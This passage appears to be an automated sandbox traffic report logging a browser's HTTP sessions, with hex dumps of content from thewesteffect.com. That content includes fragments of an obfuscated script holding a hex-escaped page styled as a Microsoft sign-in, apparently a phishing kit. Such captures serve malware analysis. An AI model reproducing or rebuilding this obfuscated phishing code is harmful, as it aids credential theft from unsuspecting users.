                                          2024-11-18 22:43:55 UTC8000INData Raw: 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                          Data Ascii: 0.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
                                          2024-11-18 22:43:55 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                          Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\x0a\x20\x20\x20\x20\x
                                          2024-11-18 22:43:55 UTC8000INData Raw: 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 6c 61 62 65 6c 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78
                                          Data Ascii: 43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20label\x20{\x0a\x20\x
                                          2024-11-18 22:43:55 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e
                                          Data Ascii: \x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20poin
                                          2024-11-18 22:43:55 UTC8000INData Raw: 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                          Data Ascii: gsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\
                                          2024-11-18 22:43:55 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                          Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                          2024-11-18 22:43:55 UTC8000INData Raw: 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                          Data Ascii: t\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.44974113.35.58.714435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:55 UTC568OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                          Host: cdn.socket.io
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Origin: https://thewesteffect.com
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://thewesteffect.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:56 UTC703INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 49993
                                          Connection: close
                                          Accept-Ranges: bytes
                                          Access-Control-Allow-Origin: *
                                          Cache-Control: public, max-age=31536000, immutable
                                          Content-Disposition: inline; filename="socket.io.min.js"
                                          Date: Thu, 05 Sep 2024 12:10:03 GMT
                                          ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                          Server: Vercel
                                          Strict-Transport-Security: max-age=63072000
                                          X-Vercel-Cache: HIT
                                          X-Vercel-Id: fra1::qxsjc-1725538203767-a565e46decc2
                                          X-Cache: Hit from cloudfront
                                          Via: 1.1 9a97e41242551c9a56be1311e4d3db70.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: FRA60-P10
                                          X-Amz-Cf-Id: RKDezNF_fij5s0R_AuZ_ThAxR70tXacYXPh_-rc-5VT7uRjCl5gd4w==
                                          Age: 7243887
                                          2024-11-18 22:43:56 UTC15681INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                          Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                          2024-11-18 22:43:56 UTC16384INData Raw: 69 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75
                                          Data Ascii: id this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fu
                                          2024-11-18 22:43:56 UTC16384INData Raw: 3a 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68
                                          Data Ascii: :e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,th
                                          2024-11-18 22:43:56 UTC1544INData Raw: 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72
                                          Data Ascii: setTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.449742184.28.90.27443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:56 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          Accept-Encoding: identity
                                          User-Agent: Microsoft BITS/7.8
                                          Host: fs.microsoft.com
                                          2024-11-18 22:43:56 UTC467INHTTP/1.1 200 OK
                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                          Content-Type: application/octet-stream
                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                          Server: ECAcc (lpl/EF4C)
                                          X-CID: 11
                                          X-Ms-ApiVersion: Distribute 1.2
                                          X-Ms-Region: prod-weu-z1
                                          Cache-Control: public, max-age=151288
                                          Date: Mon, 18 Nov 2024 22:43:56 GMT
                                          Connection: close
                                          X-CID: 2


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.449743192.254.232.1334435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:56 UTC351OUTGET /n/jsnom.js HTTP/1.1
                                          Host: thewesteffect.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:56 UTC263INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:56 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Mon, 11 Nov 2024 07:43:41 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 100217
                                          Vary: Accept-Encoding
                                          Content-Type: text/javascript
                                          2024-11-18 22:43:56 UTC7929INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                          Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                          2024-11-18 22:43:56 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 78 2d 77 69 64 74 68 3a 5c 78 32 30 31 30
                                          Data Ascii: 20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x20\x20max-width:\x2010
                                          2024-11-18 22:43:56 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35 39 2c 5c 78 32 30 35 39 29 29 3b 5c 78 30 61 5c 78 32 30 5c 78
                                          Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x2059,\x2059));\x0a\x20\x
                                          2024-11-18 22:43:56 UTC8000INData Raw: 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                          Data Ascii: 0.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
                                          2024-11-18 22:43:56 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                          Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\x0a\x20\x20\x20\x20\x
